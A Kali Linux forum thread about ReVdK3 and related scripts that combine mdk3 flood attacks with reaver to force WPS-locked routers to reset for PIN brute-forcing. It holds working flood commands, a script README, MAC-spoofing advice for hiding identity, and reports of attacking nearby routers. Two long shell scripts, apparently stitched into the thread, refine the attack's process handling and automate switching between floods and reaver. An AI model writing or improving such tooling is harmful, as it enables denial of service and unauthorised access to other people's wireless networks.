Hello hello friends, thank you so much soxrok2212, you are a great guy, I am so grateful for your help.
Wow, I never expected to see this thread reach 50,000 views. I guess it's pretty popular. I'm very doubtful here, but is there anyone who knows how to make a full GUI with all the methods posted by various users here? It would include options for:
1.) mac changing after a specified number of pin trials
2.) reaver incorporated, of course ;D
3.) MDK3 auth flood
4.) beacon flood
5.) MIC failure
6.) deauth
7.) EAPOL failure
More??
It would just be nice to have a full GUI for EVERYTHING posted by users here... plus having a few terminal windows open and typing in the commands every time is a bit annoying. I'm not talking about a script here, a full blown GUI.
I'm doubtful but the community here is pretty big. And maybe, just maybe we could get it pushed to be a standard tool in Kali!
Musket Teams wish to note that there are no MAC address spoofing routines written into ReVdK3. Users will be broadcasting using their hardware-installed MAC address. We have no comment on the program itself, as until we write these routines into the script we will only do cursory tests.
Please note I have written the little script ReVdK3 for free distribution and to contribute worthily to the Kali Linux forum and the mdk3 team.
It is COMMON COURTESY for any team or individual that wants to improve this script to request my consent or to create the script
with an invented name of their own. This is because improvement of this script is set aside by me in the near future... thank you...
A Peer Review of ReVdK3
This thread will not discuss the ability of ReVdK3 to actually reset a router.
Musket Teams have been working with soxrok2212 since this mdk3 approach to reset routers remotely was conceived. The current ReVdK3 approach by repzeroworld is novel, hence once we got a copy of the program we tested it in our lab.
This program tries to run three (3) mdk3 attacks from a single terminal window process using $MON1, $MON2 and $MON3 (i.e. mon0, mon1, mon2). We have tested the stock ReVdK3 and find no indication that $MON2 and $MON3 are functioning.
When running ReVdK3 against the target AP, airodump-ng clearly shows only one (1) mdk3 process running.
To prove these processes were not masking themselves one over the other, we ran the three (3) processes in separate terminal windows, first manually, then in Eterm and Xterm windows. Airodump-ng clearly shows all three (3) processes functioning when run from separate terminal windows, and only one (1) process when running ReVdK3.
To further prove this we gave each monitor, i.e. $MON1, $MON2, $MON3, an individual MAC address. When running the three (3) mdk3 attacks from Eterm windows embedded in the ReVdK3 program, these different MAC addresses were expressed in the Eterm window AND airodump-ng showed data transference from these three (3) monitor/MAC address pairs. When we ran the stock ReVdK3 only a single process running on $MON1 was seen.
We believe the author's original approach using three (3) terminal windows was the correct one.
If you want to run three (3) separate processes off the physical device $WLAN from a bash script, you need to run Eterm or Xterm windows, one (1) for each process.
As the author has expressed a desire to view other work on the subject, a copy of a possible Eterm window solution, starting at line 438 in the stock program, can be seen below:
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
# One Eterm window per monitor interface. Each runs a time-bounded EAPOL-Start
# flood (mdk3 "x" mode, test 0) against $MAC/$ESSID, then drops into bash so the
# window stays open. The different -g offsets place the three windows apart.
Eterm -g 80x10-1-400 --cmod "red" -T "Packet Flood $MON1" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 100; bash" &
sleep 2
Eterm -g 80x10-1-250 --cmod "red" -T "Packet Flood $MON2" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 100; bash" &
sleep 2
Eterm -g 80x10-1-70 --cmod "red" -T "Packet Flood $MON3" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 100; bash" &
sleep 2
fi
# Once the floods are done, close any Eterm windows still open
killall -q Eterm &> /dev/null
MTA and MTD
Last edited by mmusket33; 2014-05-06 at 06:14.
When ReVdK3 was distributed, the script was revised shortly afterwards to correct this problem using a tricky method and was given to my acquaintances who willingly volunteered to test. For a second reminder see below.
"Please note I have written the little script ReVdK3 for free distribution and to contribute worthily to the Kali Linux forum and the mdk3 team.
It is COMMON COURTESY for any team or individual that wants to improve this script to request my consent or to create the script
with an invented name of their own. This is because improvement of this script is set aside by me in the near future... thank you..."
ReVdK3 had some issues that I wasn't aware of when it was first distributed.
I became aware of these bugs when viewers tested the script and provided me with their feedback....
Thank you to those people who provided the feedback that helped me trace where the problems were...
Some of the problems were as follows:
1. Whenever the script ran and was terminated, bash left mdk3 running in the background (the "while ; do" loop problem). If the script was restarted,
this resulted in duplication of many mdk3 processes, which affected not only the mdk3 attack but also reaver and the monitor interfaces.
- This issue was fixed by killing all mdk3 processes after running and looping again.
2. The first distributed script ran the mdk3 EAPOL Start flood attack in one terminal! (The script was functioning, but it was how bash was interpreting the instructions.) Now all three EAPOL Start attacks will run in three little terminals! Issue fixed using the gnome-terminal command.
3. I increased the number of packets injected for the EAPOL attacks to help reboot one of the access points that took long to reboot/unlock (WPS).
4. I added instructions to the script to change the MAC address of your monitor and wireless interfaces... this is to help hide your identity.
the old script was taken off of the torrent link. the link for the new script is below:
http://www.legittorrents.info/index....&page=torrents
NOTE:
MDK3 WILL NOT RESET ALL ROUTERS BASED ON FEEDBACK BUT IS VERY USEFUL. As a result, the revised script can be downloaded from the link stated.
Last edited by repzeroworld; 2014-05-10 at 13:32.
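The two problems above (three floods collapsing into a single process, and mdk3 processes surviving a Ctrl-C and piling up on restart) come down to process management in the wrapper script. The following is an added example, not code from ReVdK3 or from any poster here: it launches one time-bounded flood per monitor interface as a background job from a single script (no Eterm or gnome-terminal needed), records each PID, and arms a trap so that one SIGINT, a closed terminal (SIGHUP) or normal exit kills every child and removes the scratch directory. The mdk3 argument vector mirrors the one quoted from the script; MAC, ESSID, FLOOD_SECS and the DRY_RUN switch are assumptions added here so the process handling can be exercised without a wireless card.

```shell
#!/bin/sh
# Added example (not part of ReVdK3): one bounded mdk3 EAPOL-Start flood per
# monitor interface, run as background jobs from a single script, with PID
# tracking and guaranteed cleanup on INT/HUP/TERM/EXIT.
# Assumed variables: MAC, ESSID (target), FLOOD_SECS (bound per flood),
# DRY_RUN=1 replaces mdk3 with sleep so the process handling can be tested.
MDK3="${MDK3:-mdk3}"
PIDS=""                       # space-separated PIDs of the timeout(1) wrappers
WORK="${WORK:-$(mktemp -d)}"  # per-interface logs; removed by stop_all

# start_flood IFACE SECS: start one flood, bounded by timeout(1), in the background
start_flood() {
    iface="$1"; secs="$2"
    if [ "${DRY_RUN:-0}" = 1 ]; then
        set -- sleep 600      # stand-in that just stays alive (assumption, not mdk3)
    else
        # same invocation the thread quotes: EAPOL-Start flood, 100 pkt/s
        set -- "$MDK3" "$iface" x 0 -t "${MAC:?set MAC}" -n "${ESSID:?set ESSID}" -s 100
    fi
    timeout "$secs" "$@" >"$WORK/$iface.log" 2>&1 &
    PIDS="$PIDS $!"
}

# count_alive: number of started floods whose wrapper process still exists
count_alive() {
    n=0
    for p in $PIDS; do
        if kill -0 "$p" 2>/dev/null; then n=$((n + 1)); fi
    done
    echo "$n"
}

# stop_all: TERM each wrapper (timeout forwards the signal to its child),
# reap them so nothing lingers, forget the PIDs, remove the scratch dir.
# Idempotent, so it is safe as both a signal handler and an EXIT trap.
stop_all() {
    for p in $PIDS; do kill -TERM "$p" 2>/dev/null || true; done
    for p in $PIDS; do wait "$p" 2>/dev/null || true; done
    PIDS=""
    rm -rf "$WORK"
}

# run_floods MON...: one flood per interface, cleanup armed for a single Ctrl-C,
# a closed terminal, or normal exit; returns when the bounded floods finish.
run_floods() {
    trap 'stop_all; exit 130' INT
    trap 'stop_all; exit 129' HUP TERM
    trap stop_all EXIT
    for m in "$@"; do
        start_flood "$m" "${FLOOD_SECS:-60}"
        sleep 1               # stagger start-up, as the Eterm version does
    done
    echo "started $(count_alive) flood(s) on: $*"
    for p in $PIDS; do wait "$p" 2>/dev/null || true; done
}

# Stand-alone use: REVDK3_IFACES="mon0 mon1 mon2" MAC=... ESSID=... sh floods.sh
if [ -n "${REVDK3_IFACES:-}" ]; then
    run_floods $REVDK3_IFACES
fi
```

Because every flood is wrapped in `timeout` and tracked by PID, a restart can never inherit stray mdk3 processes from the previous run, and airodump-ng will show one transmitter per monitor interface rather than one for the whole script.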
If anyone is having trouble in reaver associating to an AP, make sure your wireless card supports wireless N because the target AP may be in N only mode.
soxrok2212
Could you recommend a few wifi adapters supporting N that work with Kali? From a sources-of-supply perspective, could you recommend more than one?
MTA
I just purchased an Alfa AWUS051NH on eBay for about $35. It should be delivered within a couple of days and I'll report back after some testing. It's a dual band 150/300mbps card so I should see some speed increases over my AWUS036H, and based on some reviews, it looks pretty promising.
Got my hands on an Alfa AWUS051NH and I love it. rt2800 drivers, injection works, and I definitely prefer it over my AWUS036H because the PWR levels in airodump-ng are much more accurate (I don't think it's as powerful though...). I haven't extensively tested injection rates yet but it seems very promising. Excellent range too and only about $33 on eBay.
Last edited by soxrok2212; 2014-05-30 at 01:41.
Have you tried boosting the power levels? The routine we use to avoid the negative-one issue also boosts an RTL8187 to 30 dBm. See our thread "Simple Solution to negative one issue". You can download the routines there, or we can post them or send them to you if you wish.
MTA
Musket Teams have been working on a different approach to WPS locked routers. Instead of attempting to reset a WPS locked router, we attempted to prevent router WPS locking. Targets were routers known to lock the WPS system after X number of pin requests. We flooded the router with various combinations of mdk3 attacks while simultaneously conducting a reaver attack.
To date we have had little success! However, for those writing reset-router programs, note the following.
Reaver was always able to harvest pins while the router was being subjected to various combined mdk3 attacks. Hence there is no reason to start and stop reaver. You can leave it running in the background. If the router locks, no pins will be collected, if the router resets pins will again be harvested even though multiple mdk3 attacks are assaulting the targetAP.
So basically if you run mdk3 concurrently with reaver it will never lock out?
No we are not saying that.
We have seen the following against routers in our areas of operation.
If your target is a router whose WPS system is open BUT will lock after x number of pin attempts, then:
1. If you run combinations of mdk3 against the router AND you run reaver at the same time, reaver will continue to collect pins until the router locks. The mdk3 attacks do not disrupt the collection of pins. We have seen routers freeze but not reset and then continue, which is congruent with reaver collecting pins. What is important here is that you can run your mdk3 attack(s) and your reaver attack at the same time. Should the router reset, reaver will begin collecting pins again until the router locks, even though mdk3 is attacking the router. You do not have to run the mdk3 attack, then stop the attack and run reaver, then stop reaver and run the mdk3 attack again. Just run both and walk away.
The only problem here is that the router, when reset, might jump channels.
For historical reference we had approx. 10 target routers which were open. We ran mdk3-reaver attacks at the same time and locked all the routers.
MTA
Gotcha, so it's a bit more time efficient.
Hi guys. Can you please modify your script for me so that it starts Reaver with the -L (ignore lock) option and then does 10 attempts and stops, after that starts only mdk3 (mdk3 a -a bssid -m) for another 40 secs and stops mdk3, and then resumes Reaver with the -L (ignore lock) option again, and loops like this until the WPS pin is found. Thanks a lot, waiting for your reply. (And please with only 1 monitor interface.)
Hello.. I got your message... hectic working schedule these days... I will modify the script for your taste and send it... send me a private message with your email address on my channel or Kali..... I have finished working on a revision of the script.. ReVdK3-r1.sh (revision 1).
Some of the features of this revised script:
1. Whenever 25 successive EAPOL failures are detected, the script will flood the AP for the specified time you choose (EAPOL Start failures are caused by a variety of factors, but I decided to add this feature just to force an unresponsive access point to overload itself and do a FRESH reboot).
2. The script runs aireplay-ng and reaver in ONE terminal.. it switches periodically between the two processes without terminating either of them, not SNAPSHOTS of reaver and mdk3..... Also it keeps re-running aireplay in the event that it quits because of "no beacon frames" or other reasons.... I found that aireplay significantly adds persistence to the association process, even though reaver can associate by itself.
3. Good housekeeping: the script will automatically remove temporary files associated with the script and ensure all processes are killed upon a SINGLE (1) SIGINT (Ctrl-C) or SIGHUP signal (closing the terminal).
4. Introduced the -S flag in the reaver command line to speed up cracking...
5. A couple of minor bug fixes.
Hmm..... One cold beer to "N1Ksan" who "pushed" me to do a revision and contributed some of the ideas above.. not forgetting how many unstable versions of the script I sent him to test........
Hey man, I sent you private message here in Kali, please send it to my email.
I found out that on many TP-Link router models whose MAC address starts with "10-FE-ED", MDK3 (mdk3 a -a bssid -m) can be used for 30 seconds and then it will let you continue reaver for 10 attempts, and then you do the same thing again and again. But the issue is that WPS will show Locked as Yes even after mdk3, but will let you continue with the ignore option -L. Your previous scripts I tried didn't reset those TP-Link routers, nor even let me continue with the ignore lock option.
Best of luck and thanks again, I will test it for you if you have other scripts.
Hey friends, I want to test your scripts. I'm trying to crack WPA passwords but I fail in all tries. I need some help, some information about this you are working on. Send me a message please. PS: sorry for my English.
I think I must say that one of my wifi cards broke itself using all the mdk3 codes at the same time pointed at a specific AP, and it was at its max power.
In summary, the card was not able to transmit again.
Well, if you set it to max power you probably fried it...
RELEASE OF REVDK3-R1.sh
DOWNLOAD LINK
http://www32.zippyshare.com/v/12811261/file.html
----------------------------------------
ReVdK3-r1.sh (Revision 1) README Section
----------------------------------------
WARNING:
Do not use this script without permission from the victim to carry out the specified attacks.

This is the first official revision of the ReVdK3.sh script.
----------------------------------------
Script features in this revision
1. Runs reaver and aireplay-ng in one terminal and continuously detects when reaver is rate limiting pins.
After input of the wireless adapter interface, it checks to see if there are any monitor interfaces on that adapter interface. Any existing monitor interfaces are wiped out and three new monitor interfaces are created. The script also uses these interfaces during the attacking process. In the event that aireplay times out because of association issues or switches to "shared key open authentication", the script will re-run aireplay-ng.
2. Runs mdk3 attacks until reaver detects that the WPS state of the AP has been unlocked. Once WPS has been unlocked it kills all mdk3 attacks and waits until reaver detects WPS has been locked again.. this process goes on...
3. Upon detection of 25 successive EAPOL Start failures, the script floods the AP for 60 seconds to see if the AP will do a fresh reboot!
4. Killing the script in a terminal will trigger it to remove all tmp files, force all processes started by the script to terminate, and wipe out the three monitor interfaces it created.. be patient, about 1-2 seconds for termination of the script... Also you can close the terminal instead of killing it; this will send a hang-up signal to do the necessary cleaning up..
Last edited by repzeroworld; 2014-06-17 at 03:02. Reason: to change download link
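Items 1 to 3 of the README describe a control loop driven by what reaver prints: start the mdk3 floods when reaver reports rate limiting, stop them when pins flow again, and trigger a 60-second flood after 25 successive failures. The following is an added example, not code from ReVdK3-r1 or from any poster in this thread, showing how such a watcher can classify a reaver log and map the state to an action. It assumes reaver's usual messages as the signals: the "Detected AP rate limiting" warning quoted later in this thread, the "WPS transaction failed ... re-trying last pin" line quoted later in this thread as the failure counter, and "Trying pin" as the sign that pins are being tested again; which exact line the real script counts as an "EAPOL start failure" is not shown on the page, so the failure line used here is an assumption, and the sample session is constructed.

```shell
#!/bin/sh
# Added example (not from ReVdK3-r1): classify reaver output so a wrapper can
# decide when to start and stop mdk3. Line patterns are assumptions based on
# reaver's usual messages; FAIL_THRESHOLD mirrors the README's 25.
FAIL_THRESHOLD="${FAIL_THRESHOLD:-25}"

# classify_reaver_log < reaver.log
# Prints the state implied by the last evidence seen:
#   locked   - reaver reported AP rate limiting (WPS lock)
#   unlocked - a pin attempt is being made again (lock cleared)
#   stalled  - FAIL_THRESHOLD consecutive "re-trying last pin" with no progress
#   unknown  - none of the above yet
classify_reaver_log() {
    state=unknown; fails=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            *"Detected AP rate limiting"*)
                state=locked; fails=0 ;;
            *"Trying pin"*)
                state=unlocked; fails=0 ;;
            *"re-trying last pin"*)
                fails=$((fails + 1))
                if [ "$fails" -ge "$FAIL_THRESHOLD" ]; then state=stalled; fi ;;
        esac
    done
    echo "$state"
}

# next_action STATE: what the wrapper should do, per README items 2 and 3
next_action() {
    case "$1" in
        locked)   echo start_mdk3 ;;  # flood until reaver sees WPS unlock
        unlocked) echo stop_mdk3 ;;   # pins flowing: kill the floods, let reaver work
        stalled)  echo flood_60s ;;   # item 3: 60 s flood hoping for a fresh reboot
        *)        echo wait ;;
    esac
}

# repeat_line N TEXT: print TEXT N times (used to build constructed logs)
repeat_line() {
    i=0
    while [ "$i" -lt "$1" ]; do printf '%s\n' "$2"; i=$((i + 1)); done
}

# sample_session: a constructed reaver session (not captured output): a
# transaction failure, a lock, then pins resume, so the verdict is "unlocked"
sample_session() {
    cat <<'EOF'
Received M1
Sending M2
Received WSC NACK
Sending WSC NACK
WPS transaction failed (code: 0x04), re-trying last pin
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
[+] Trying pin 12345670
EOF
}

# Stand-alone use: tail -f reaver.log | classify_reaver_log
# (or pipe the constructed session) then feed the state to next_action.
if [ "${REVDK3_DEMO:-0}" = 1 ]; then
    state=$(sample_session | classify_reaver_log)
    echo "state=$state action=$(next_action "$state")"
fi
```

In a real wrapper the classifier would run on a live `tail -f` of reaver's log, and "stop_mdk3" would call the same cleanup routine the script uses on Ctrl-C, so the floods are killed by PID rather than left to pile up.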
Thanks for the thumbs up... having issues with the link too,
but I did manage to upload it on zippyshare.
The link is below (do tell me if it works):
http://www32.zippyshare.com/v/12811261/file.html
if the file is supposed to be 26.2 kB (26,158 bytes) in size, then yes it works.
Awesome job with ReVdK3-r1.sh.
I was able to use it to crack my Belkin N+ router when Reaver Pro couldn't attempt a single pin.
I posted a demonstration here for anyone interested:
EDIT: Youtube vids not allowed.
I think you could make the script better by including a check for gnome-terminal and an apt-get install gnome-terminal for us XFCE fans.
Also, if the script connected to the WPS protected AP as soon as it found the pin, that would be cool too (have it send an email when done).
Regards,
Last edited by sickn3ss; 2014-07-06 at 13:20.
*Post Deleted* Wrong thread, moved to Belkin Mac Address/SSID Correlation.
Last edited by soxrok2212; 2014-07-03 at 16:34.
Very interesting...
Last edited by bolexxx; 2014-07-06 at 13:27.
@ xiajapan You get that error because you are probably trying to run the script from a terminal program other than gnome-terminal.
Downloads for useful programs: I will do my best to keep these updated
Atrophy
ReVdk3-r1
FrankenScript 2
Hey, can anyone give me a hint of what this little trio is about please? Thank you very much and have a nice day.
@soxrok2212
REVDK3-R1.sh seemed to work well for one router, but I've tried on another and I seem to be stuck at trying the same pin over and over again. I've even bumped to -t 40
This loops:
Received M1
Sending M2
Received M1
Received WSC NACK
Sending WSC NACK
WPS transaction failed (code: 0x04), re-trying last pin
...
Running Reaver by itself and tweaking the settings gives just about the same results. Any other ways to see what's going on?
Last edited by gismo; 2014-07-10 at 23:48.
Well, I can open the script, but when I run it the following message appears every time:
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
What can I do to continue the attack?
Atrophy is a basic program that uses MDK3 to attempt to reboot routers (helpful when trying to unlock WPS.) The program uses Authentication flood, Michael Integrity Check failure, beacon flood, and deauthentication (a few others too depending on your configuration.)
ReVdk3 is a similar program to Atrophy, but it uses a different approach to attack an access point. It uses EAPOL start and stop attacks to attempt to reboot the router.
Frankenscript 2 is a full blown program that offers a wide range of tools to attack access points. You can find more info here.
@OE 800, thanks for your answer. I am using xiaopan OS in VirtualBox so I don't really know what terminal I am using... I tried to install gnome-terminal by using the command sudo apt-get install gnome-terminal but I got the message that the apt-get command was not found...
There is a very, very small chance that reaver has incorrectly reported that WPS is locked. Test this by putting a -L in the reaver command line. If the warning remains, you can attempt to reset the router remotely with one of the reset-router programs. Otherwise wait till the router unlocks, or collect a handshake and try brute forcing the handshake, or go WPA phishing and/or look for other targets.
MTB
I cannot reset the WPS locked status on 2 routers with the attacks,
it's like nothing is happening.
The router automatically unlocks after a day or two.
This is a Kali-Linux support forum, not a general infosec/"hacking" forum.
As a result, this thread has been locked due to it not being related to the nature of the forum.